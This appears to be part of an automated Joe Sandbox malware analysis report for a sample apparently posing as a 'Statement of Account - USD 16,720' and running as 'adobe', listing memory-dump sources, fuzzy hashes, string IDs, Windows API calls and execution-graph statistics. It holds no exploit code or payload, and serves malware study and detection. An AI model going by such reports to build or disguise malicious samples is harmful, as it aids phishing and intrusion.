                                                  • Instruction Fuzzy Hash: 9D11F2B5C00258CFDB20DFAAD448B9EBBF8AB49324F148459D558A7610C378A544CFA5
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,0675823D), ref: 067582C7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Instruction ID: 514e21dfec586250df1efa5bd0608866957ec3cb82cd459a44365ae8282c429b
                                                  • Opcode Fuzzy Hash: d2d16d36f1c0bf304478a8a33d427c309f7650e1fe1ead684c3160a428f93360
                                                  • Instruction Fuzzy Hash: C121D0B16043059FDB04DF14D980B2ABB65FB85328F20C56DEA0B4B651C33AD846C6A1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4484410220.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cad000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eb06d4787416dd01710c7c620274dd5b57f1beee10d28dc975c87ad44f3a108c
                                                  • Instruction ID: 4b537f4ad3d61f2bcd716e6cb160252973e44ca0b098792f1b88251d345d4389
                                                  • Opcode Fuzzy Hash: eb06d4787416dd01710c7c620274dd5b57f1beee10d28dc975c87ad44f3a108c
                                                  • Instruction Fuzzy Hash: A7215C3550D3C08FDB03CB24C990715BF71AB46214F29C5DBD88A8B6A3C23A980ACB62
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5d8e3487b5ac6c5b750af7c7df0cfdee7819b7d237b3cc06538f0c457cbbfd4b
                                                  • Instruction ID: 25fb7361922d3feaacee452f660fed44b5c7b9aa984004a0fb21bddde43e6ab7
                                                  • Opcode Fuzzy Hash: 5d8e3487b5ac6c5b750af7c7df0cfdee7819b7d237b3cc06538f0c457cbbfd4b
                                                  • Instruction Fuzzy Hash: 2011C671E106488BDF60CEE9D8803EEFBB2EF8A710F104627E809EB200D37554858B51
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a735f3612f45e1c0c4d5e625fe24a25874a87db11f5171c3e7ad060283971703
                                                  • Instruction ID: 9738fb30a476dc97a83d125f32f2608c205db483342066dbc8397e371e0d484b
                                                  • Opcode Fuzzy Hash: a735f3612f45e1c0c4d5e625fe24a25874a87db11f5171c3e7ad060283971703
                                                  • Instruction Fuzzy Hash: 9A11DE35B041511BCB65867E94597AEBBDACBCA720F10843FF50EC7792EE24DC468391
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aa1095e9e8940048d73424dfa475c1eef5e2d912d29b6de017148b651139182d
                                                  • Instruction ID: 34c15627c8dc49aad34d15db41d674fd753df3d5c0cdf85d340a5fd61ab19687
                                                  • Opcode Fuzzy Hash: aa1095e9e8940048d73424dfa475c1eef5e2d912d29b6de017148b651139182d
                                                  • Instruction Fuzzy Hash: F211A136B101284BDF54EBB8DC146EE73E6ABC8621B008539D40AE7384EE65DC468BD1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b47839686bab48929e7f43996abb43f00609314c8672c049e1f15b6a2fd7e689
                                                  • Instruction ID: de015cc7da21311c7ba6756ed31a6a0b11952862202ebf2aa2bc70acaead5147
                                                  • Opcode Fuzzy Hash: b47839686bab48929e7f43996abb43f00609314c8672c049e1f15b6a2fd7e689
                                                  • Instruction Fuzzy Hash: 66012832F000245BEB949BBCDC147FE76EA9BC4660F044236D10AD7294EE21CC4647D2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 571d71d92945a13b25ec430818813bf38b0dab7f1f655a456ac69f7f90aa91c2
                                                  • Instruction ID: 10a1ed5071536dbd28a04e56c1ab74d7a9a2a0996a51c12776ace6cd114c99c4
                                                  • Opcode Fuzzy Hash: 571d71d92945a13b25ec430818813bf38b0dab7f1f655a456ac69f7f90aa91c2
                                                  • Instruction Fuzzy Hash: 4E01B1317001100FDB66967C98A97BE7BD6DBCA750F118839E50AC7352EA25DC038385
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6a7ccba97be02f10a814c50b07160ab7f2c6524407f33ead189c1b82153583b7
                                                  • Instruction ID: 701d29f560310df18c1805ec698c582288b0d6d8191b385dc100b5a9127da126
                                                  • Opcode Fuzzy Hash: 6a7ccba97be02f10a814c50b07160ab7f2c6524407f33ead189c1b82153583b7
                                                  • Instruction Fuzzy Hash: 4221C4B5D01259AFCB10DF9AD884ADEFBB8FB48324F10826AE518A7240C7786544CBE5
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: baadfd2e6a80e6be33c915dfae2c62bb966ed515f75bb5ccc0bba858fdcd313e
                                                  • Instruction ID: 8a596050cb105e70db0cbcadbf66e558e53c63e376a8c2d0b1e0e17c470697ef
                                                  • Opcode Fuzzy Hash: baadfd2e6a80e6be33c915dfae2c62bb966ed515f75bb5ccc0bba858fdcd313e
                                                  • Instruction Fuzzy Hash: 4201D431B001510FEB659A78E954BBA7BE5EBC7724F14882AF319C7355DE21DC02C785
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4484410220.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cad000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                                  • Instruction ID: 55c8eca12cdd9cc3aeb4bf0b381500e8684986fd664c32c7cf07849c9366bab5
                                                  • Opcode Fuzzy Hash: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                                  • Instruction Fuzzy Hash: DC11D075504280CFCB05CF10D5C4B19BF72FB45328F24C6ADD94A4B662C33AD94ACB51
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e137cb03aed29947052799a3d706057f0cc44c54d02f542544e90dc4ecc23f74
                                                  • Instruction ID: d23fedcb3008529715ae47242dd416bdcc737020ed4d98a780b9a0808d56bd3d
                                                  • Opcode Fuzzy Hash: e137cb03aed29947052799a3d706057f0cc44c54d02f542544e90dc4ecc23f74
                                                  • Instruction Fuzzy Hash: 2B11D3B5D012599FCB00DF9AD884ADEFBB4FB48324F10812AE518A7200C3786544CFE5
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dc40077670fb4dfa4c551620a92cf4e55afc9bdf3543cab47895951a9c1a0a17
                                                  • Instruction ID: a13f2f78d28e20085fb77c590d46c20a5ee87a21e0aaddd1b46693030e8d440a
                                                  • Opcode Fuzzy Hash: dc40077670fb4dfa4c551620a92cf4e55afc9bdf3543cab47895951a9c1a0a17
                                                  • Instruction Fuzzy Hash: AF01FF36B100110BDB649A7DD459B6FB7DACBC9720F20883AF50EC7391DE21DC424385
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e8a0b9cd9274f4279c1e4ba05dff3f98c4f6f46292a6c6bfc53682c03ad09212
                                                  • Instruction ID: b7ce1c8fc0e9f69988e86375e6541c70af9c359945c4a385a84727c9a588e625
                                                  • Opcode Fuzzy Hash: e8a0b9cd9274f4279c1e4ba05dff3f98c4f6f46292a6c6bfc53682c03ad09212
                                                  • Instruction Fuzzy Hash: 1301AF36B104100BEB65997DD899BBEB7DADBC9760F108839F50EC7351EE25DC024385
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e57b1850eb96f5f5343aca68aae3b44111f7fded1cfce0bb000ab6d1a6f9486
                                                  • Instruction ID: cf361318aa93c6c77c0e01a1837710c3db57c567be1726bfed4d7bf0f3b6a395
                                                  • Opcode Fuzzy Hash: 5e57b1850eb96f5f5343aca68aae3b44111f7fded1cfce0bb000ab6d1a6f9486
                                                  • Instruction Fuzzy Hash: 9401D131B000100FDB60EA29E858B6A77D5EBCA728F108838F20AC7354DE21DC02C781
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0d4dad52f747da0feb587566b9e74923b2b20a812393724feba06b18b0d753ae
                                                  • Instruction ID: 57cabd16e48183923c69ac37beb6d77eb4e24abc3a06b736aa412eea055dd634
                                                  • Opcode Fuzzy Hash: 0d4dad52f747da0feb587566b9e74923b2b20a812393724feba06b18b0d753ae
                                                  • Instruction Fuzzy Hash: 1AF02B31E2C34CABEB20CE75C809BAEB758DB42218F20C9A5F604DB181D177CA01DB80
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12f701c29e7df930c5f6445dbfbe766566433816420c95a2ddc918d15dbbb174
                                                  • Instruction ID: 7abf307b405b8c168b5650d06250fc8901bfcf8f97542d6b7923b6241bcc77b9
                                                  • Opcode Fuzzy Hash: 12f701c29e7df930c5f6445dbfbe766566433816420c95a2ddc918d15dbbb174
                                                  • Instruction Fuzzy Hash: 8AE0C271E2011CABEF10CEB1C905BAEB3ACE702208F20C8A5DA08C7241E177CA01D380
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-2843079600
                                                  • Opcode ID: dad649a4b1a05318b9f5663b4c0b105b7201cdf35c9e003abf9013239c8df33f
                                                  • Instruction ID: 78567c775c5bb7df61c94f8b4b17879e95acf1770b641fbdfa6320851bce4ba0
                                                  • Opcode Fuzzy Hash: dad649a4b1a05318b9f5663b4c0b105b7201cdf35c9e003abf9013239c8df33f
                                                  • Instruction Fuzzy Hash: A5121B30E002198FDB68DF79C994BADB7B2BF89304F209969D409AB265DB349D45CF81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-1273862796
                                                  • Opcode ID: b92253f16d1a2bcd2242d08d23600fa95d5e9e638f477d92c936e88f74b1a64a
                                                  • Instruction ID: b1d509fbdaf0ca985f903bf681658ee1b4181fda6d96e649c31fd81d4fac95fc
                                                  • Opcode Fuzzy Hash: b92253f16d1a2bcd2242d08d23600fa95d5e9e638f477d92c936e88f74b1a64a
                                                  • Instruction Fuzzy Hash: B9919030E00209DFEB68EF68D984BBE7BF6EF84304F109529E40197695DB749D46CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-981061697
                                                  • Opcode ID: 239485c65bca079b016a52a4d34942044aa786f269c8a24bf9a27ddfcb1a458f
                                                  • Instruction ID: c78d7e764cad8faa89a314eae86e0ceea639fd94005b2bfe549398af93e6f52c
                                                  • Opcode Fuzzy Hash: 239485c65bca079b016a52a4d34942044aa786f269c8a24bf9a27ddfcb1a458f
                                                  • Instruction Fuzzy Hash: 39F14D30A00208CFDB59EBA8D994BAEB7B6BF85304F248529E4059B799DF35DC46DF40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-3723351465
                                                  • Opcode ID: a6b0ba8f0b9df349ea90b6f5ab34f93bec1fc22bc069ddb366f55f00c84a557b
                                                  • Instruction ID: 61db61aa128405b4226e5e18d5eacb0e2b213d6a148ad1c0f5c03c08dc89afd4
                                                  • Opcode Fuzzy Hash: a6b0ba8f0b9df349ea90b6f5ab34f93bec1fc22bc069ddb366f55f00c84a557b
                                                  • Instruction Fuzzy Hash: D171B131E002098FDB68CF68D994BADB7B6EF84B00F209929D806DB254DF70DD45CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: 10734faa0782c7ea550f575e6496d75714a0cc23d088d7e8b5f121967be40d3c
                                                  • Instruction ID: 81ee22df08a6c936f47fa7181ba56c92ce8565f1e57fbada372d82fe5b50452c
                                                  • Opcode Fuzzy Hash: 10734faa0782c7ea550f575e6496d75714a0cc23d088d7e8b5f121967be40d3c
                                                  • Instruction Fuzzy Hash: 70B15B30A10208CFDB68EFB9C9947AEB7B6EF84304F248529D4059B395DB75DC86CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR]q$LR]q$$]q$$]q
                                                  • API String ID: 0-3527005858
                                                  • Opcode ID: e2f871696f28a63a44d8ef5acbd80c4e7d7317895b4c607a551a2e1002f859b8
                                                  • Instruction ID: 4be92d33c12cc755a210c9446169bc7ac8c8962238035cc4edbbe62a7be66ca0
                                                  • Opcode Fuzzy Hash: e2f871696f28a63a44d8ef5acbd80c4e7d7317895b4c607a551a2e1002f859b8
                                                  • Instruction Fuzzy Hash: CE51B330B002059FDB68DF28D985BAA77FAFF85304F149569E4069B399DB30EC45CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: 0337247c74b7d4f9516ed48230d2425d58ffcd726434afafd147793954a226a3
                                                  • Instruction ID: 57874e53af03b1098dbc0e4fb9b8a274f736f1159df6876e1a7a77087a50b3b8
                                                  • Opcode Fuzzy Hash: 0337247c74b7d4f9516ed48230d2425d58ffcd726434afafd147793954a226a3
                                                  • Instruction Fuzzy Hash: DD51BE30E102088FDF65EB68DA80BEEB7B2EF85300F10952AE80597355DB35EC41DB90

                                                  Execution Graph

                                                  Execution Coverage:9%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:34
                                                  Total number of Limit Nodes:5
                                                  execution_graph 14724 273d460 14725 273d464 DuplicateHandle 14724->14725 14726 273d4f6 14725->14726 14727 273ad68 14730 273ae50 14727->14730 14728 273ad77 14731 273ae94 14730->14731 14732 273ae71 14730->14732 14731->14728 14732->14731 14733 273b098 GetModuleHandleW 14732->14733 14734 273b0c5 14733->14734 14734->14728 14735 2734668 14736 273467a 14735->14736 14737 2734686 14736->14737 14739 2734779 14736->14739 14740 273479d 14739->14740 14744 2734878 14740->14744 14748 2734888 14740->14748 14746 2734888 14744->14746 14745 273498c 14745->14745 14746->14745 14752 2734248 14746->14752 14750 27348af 14748->14750 14749 273498c 14749->14749 14750->14749 14751 2734248 CreateActCtxA 14750->14751 14751->14749 14753 2735918 CreateActCtxA 14752->14753 14755 27359db 14753->14755 14756 273d218 14757 273d25e GetCurrentProcess 14756->14757 14759 273d2b0 GetCurrentThread 14757->14759 14760 273d2a9 14757->14760 14761 273d2e6 14759->14761 14762 273d2ed GetCurrentProcess 14759->14762 14760->14759 14761->14762 14765 273d323 14762->14765 14763 273d34b GetCurrentThreadId 14764 273d37c 14763->14764 14765->14763

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 0273D296
                                                  • GetCurrentThread.KERNEL32 ref: 0273D2D3
                                                  • GetCurrentProcess.KERNEL32 ref: 0273D310
                                                  • GetCurrentThreadId.KERNEL32 ref: 0273D369
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159823673.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2730000_adobe.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 0273D296
                                                  • GetCurrentThread.KERNEL32 ref: 0273D2D3
                                                  • GetCurrentProcess.KERNEL32 ref: 0273D310
                                                  • GetCurrentThreadId.KERNEL32 ref: 0273D369
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159823673.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2730000_adobe.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0273B0B6
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159823673.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2730000_adobe.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 027359C9
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159823673.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2730000_adobe.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 027359C9
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159823673.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2730000_adobe.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0

                                                  Control-flow Graph

                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0273D4E7
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159823673.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2730000_adobe.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0

                                                  Control-flow Graph

                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0273D4E7
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159823673.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2730000_adobe.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0273B0B6
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159823673.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2730000_adobe.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159355862.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_ebd000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159469174.000000000267D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0267D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_267d000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:

                                                  Execution Graph

                                                  Execution Coverage:7.7%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:19
                                                  Total number of Limit Nodes:4

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-3723351465

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q
                                                  • API String ID: 0-127220927
                                                  • Opcode ID: 1287edb145d4cb7f1ee7dd6c03d6f6482b2135416c33bcf6cd5e5155db6276aa
                                                  • Instruction ID: d219f0cfc894a3806d801230c324c3470632ab79401706862a5df67aeec2d284
                                                  • Opcode Fuzzy Hash: 1287edb145d4cb7f1ee7dd6c03d6f6482b2135416c33bcf6cd5e5155db6276aa
                                                  • Instruction Fuzzy Hash: F6027B30B002259FDB54EB64D990BAEB7B6FF84304F248569E409DB394DB39EC46CB81

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  • Opcode ID: 1c849cedbb0e8219835689d7547236de40743bc45ae167add72da2627e47fb6b
                                                  • Instruction ID: 3d5497c900d8f404f7923f374e7a3aa4c68d3a9f8bcc995bda473276754d7139
                                                  • Opcode Fuzzy Hash: 1c849cedbb0e8219835689d7547236de40743bc45ae167add72da2627e47fb6b
                                                  • Instruction Fuzzy Hash: B322D335E002299FDF64EFA8C5806AEB7F2EF85314F248469E449AB344DB35DD42CB91
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d5e6c08030c308c8658d991b5cd66dea77de8a05ecd5dbb7fde35361cd7d47a
                                                  • Instruction ID: 4253769d7dff60dab1d8bf110d324212d42279b3cbe9debf3135aae45e552c16
                                                  • Opcode Fuzzy Hash: 7d5e6c08030c308c8658d991b5cd66dea77de8a05ecd5dbb7fde35361cd7d47a
                                                  • Instruction Fuzzy Hash: 7862AC34B002259FDB54EB68D580BADB7F2EF88354F248469E806EB355DB35EC46CB80
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
